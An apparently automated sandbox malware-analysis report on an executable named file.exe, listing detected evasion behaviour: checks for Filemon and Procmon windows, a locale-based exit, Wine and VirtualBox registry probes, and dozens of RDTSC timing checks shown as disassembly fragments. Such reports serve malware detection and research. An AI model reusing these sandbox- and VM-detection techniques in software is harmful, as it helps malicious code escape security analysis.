                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00129BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00129BB0

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-37643
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FE263 second address: 3FE268 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5864AD second address: 5864B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 586634 second address: 58664B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F96F934F1ECh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 586A24 second address: 586A4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jng 00007F96F95D6D66h 0x0000000c popad 0x0000000d jmp 00007F96F95D6D72h 0x00000012 push eax 0x00000013 push edx 0x00000014 jns 00007F96F95D6D66h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 586BB8 second address: 586BBD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 586D12 second address: 586D18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 586D18 second address: 586D22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 586D22 second address: 586D26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 586D26 second address: 586D2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 586D2C second address: 586D3F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F96F95D6D6Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58A159 second address: 58A15F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58A15F second address: 58A1C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F95D6D6Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 0E86DFDBh 0x00000010 jmp 00007F96F95D6D74h 0x00000015 push 00000003h 0x00000017 mov cx, ax 0x0000001a push 00000000h 0x0000001c jmp 00007F96F95D6D79h 0x00000021 push 00000003h 0x00000023 mov dword ptr [ebp+122D2389h], ecx 0x00000029 call 00007F96F95D6D69h 0x0000002e push eax 0x0000002f push edx 0x00000030 jno 00007F96F95D6D6Ch 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58A1C9 second address: 58A1CE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58A1CE second address: 58A1F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F96F95D6D76h 0x0000000e jc 00007F96F95D6D6Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58A1F5 second address: 58A207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F96F934F1E6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58A207 second address: 58A25D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F96F95D6D66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F96F95D6D77h 0x0000000f popad 0x00000010 mov eax, dword ptr [eax] 0x00000012 jmp 00007F96F95D6D76h 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b pushad 0x0000001c jng 00007F96F95D6D73h 0x00000022 jmp 00007F96F95D6D6Dh 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58A25D second address: 58A261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58A387 second address: 58A3A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F96F95D6D75h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58A3A0 second address: 58A3B7 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F96F934F1E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007F96F934F1E8h 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58A3B7 second address: 58A3D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F95D6D6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push edx 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 pop edx 0x00000013 mov eax, dword ptr [eax] 0x00000015 push ebx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58A3D8 second address: 58A3E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58A3E8 second address: 58A3EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58A3EE second address: 58A480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop eax 0x00000007 mov dword ptr [ebp+122D23EFh], edx 0x0000000d push 00000003h 0x0000000f sub esi, dword ptr [ebp+122D38BEh] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007F96F934F1E8h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000019h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 mov esi, dword ptr [ebp+122D39CEh] 0x00000037 push 00000003h 0x00000039 jng 00007F96F934F1ECh 0x0000003f sub esi, dword ptr [ebp+122D392Eh] 0x00000045 push A28ED3BFh 0x0000004a jmp 00007F96F934F1F6h 0x0000004f add dword ptr [esp], 1D712C41h 0x00000056 sub dword ptr [ebp+122D225Ch], esi 0x0000005c lea ebx, dword ptr [ebp+1245FFFCh] 0x00000062 or esi, 7F12A78Fh 0x00000068 xchg eax, ebx 0x00000069 jmp 00007F96F934F1EBh 0x0000006e push eax 0x0000006f push eax 0x00000070 push edx 0x00000071 pushad 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58A480 second address: 58A486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58A486 second address: 58A48B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58A5E2 second address: 58A5E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58A5E6 second address: 58A5EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58A6AD second address: 58A6B7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F96F95D6D66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59C6B1 second address: 59C6E1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F96F934F1E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007F96F934F1F0h 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F96F934F1F1h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A985C second address: 5A9860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9860 second address: 5A9864 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9864 second address: 5A9870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9870 second address: 5A988A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F934F1F0h 0x00000007 jc 00007F96F934F1E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A988A second address: 5A9892 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A99E7 second address: 5A99EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A99EB second address: 5A99FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F95D6D6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A99FA second address: 5A9A09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 jbe 00007F96F934F1E6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9B57 second address: 5A9B63 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F96F95D6D66h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9FD1 second address: 5A9FDB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F96F934F1E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9FDB second address: 5A9FEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F96F95D6D6Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9FEF second address: 5A9FF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9FF5 second address: 5AA00C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F96F95D6D6Eh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AA00C second address: 5AA012 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AA57A second address: 5AA599 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 jnl 00007F96F95D6D66h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F96F95D6D6Dh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AA71E second address: 5AA74F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F934F1EEh 0x00000007 jmp 00007F96F934F1F1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jno 00007F96F934F1E6h 0x00000016 jp 00007F96F934F1E6h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AA74F second address: 5AA759 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F96F95D6D66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AA759 second address: 5AA763 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F96F934F1E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AA9CA second address: 5AA9F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F96F95D6D6Fh 0x0000000b popad 0x0000000c jmp 00007F96F95D6D73h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB1B2 second address: 5AB1C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F96F934F1F2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB341 second address: 5AB345 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB345 second address: 5AB34B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB61A second address: 5AB61E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB61E second address: 5AB624 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB624 second address: 5AB638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F96F95D6D6Eh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB638 second address: 5AB63D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AEC58 second address: 5AEC5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AEC5E second address: 5AEC88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007F96F934F1F9h 0x0000000b pushad 0x0000000c popad 0x0000000d jg 00007F96F934F1E6h 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AEC88 second address: 5AEC94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F96F95D6D66h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B4911 second address: 5B4916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B4A57 second address: 5B4A5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B4A5D second address: 5B4A61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B4A61 second address: 5B4A6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B4A6F second address: 5B4A73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B4A73 second address: 5B4A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B7664 second address: 5B766A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B766A second address: 5B7675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B7675 second address: 5B767B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B767B second address: 5B7680 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B7680 second address: 5B76A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F96F934F1E6h 0x0000000a jmp 00007F96F934F1F9h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B782C second address: 5B7832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B79B4 second address: 5B79BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B79BA second address: 5B79C4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F96F95D6D66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B79C4 second address: 5B79D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jo 00007F96F934F1E6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B79D0 second address: 5B79D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B7AFA second address: 5B7B2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F934F1F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F96F934F1F7h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B7FAB second address: 5B7FB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B7FB1 second address: 5B7FBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B7FBC second address: 5B7FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B8131 second address: 5B8139 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B9F09 second address: 5B9F2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F961C6ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F96F961C6B3h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B9F2F second address: 5B9F4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F8D16A27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B9F4D second address: 5B9F85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F96F961C6A6h 0x0000000a popad 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push edx 0x00000011 jns 00007F96F961C6A8h 0x00000017 pop edx 0x00000018 mov eax, dword ptr [eax] 0x0000001a pushad 0x0000001b jmp 00007F96F961C6AAh 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 popad 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B9F85 second address: 5B9F8F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F96F8D16A16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BAF3E second address: 5BAF44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BAF44 second address: 5BAF48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BBFA2 second address: 5BBFA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BBFA7 second address: 5BBFF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F8D16A1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F96F8D16A18h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 movzx esi, bx 0x00000029 push 00000000h 0x0000002b mov dword ptr [ebp+122D2922h], ecx 0x00000031 push 00000000h 0x00000033 xchg eax, ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F96F8D16A1Dh 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BCFFB second address: 5BD001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
